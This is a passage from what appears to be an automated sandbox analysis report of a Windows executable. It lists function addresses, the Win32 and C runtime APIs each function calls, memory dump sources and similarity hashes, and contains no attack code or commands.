                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                                                                                                                                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                                                                                                                                                                                                                                                                                                                                                • __freefls@4.LIBCMT ref: 00413D74
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 259663610-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004302E6
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00430364
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3220332590-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1612042205-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 0044C570
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2221674350-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcscpy$_wcscat
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2037614760-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                                                                                                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Variant$Copy$AllocClearErrorLastString
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 960795272-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                                                                                                                                                                                                                                                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                                                                                                                                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4189319755-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                                                                                                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1976402638-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                                                                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                                                                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
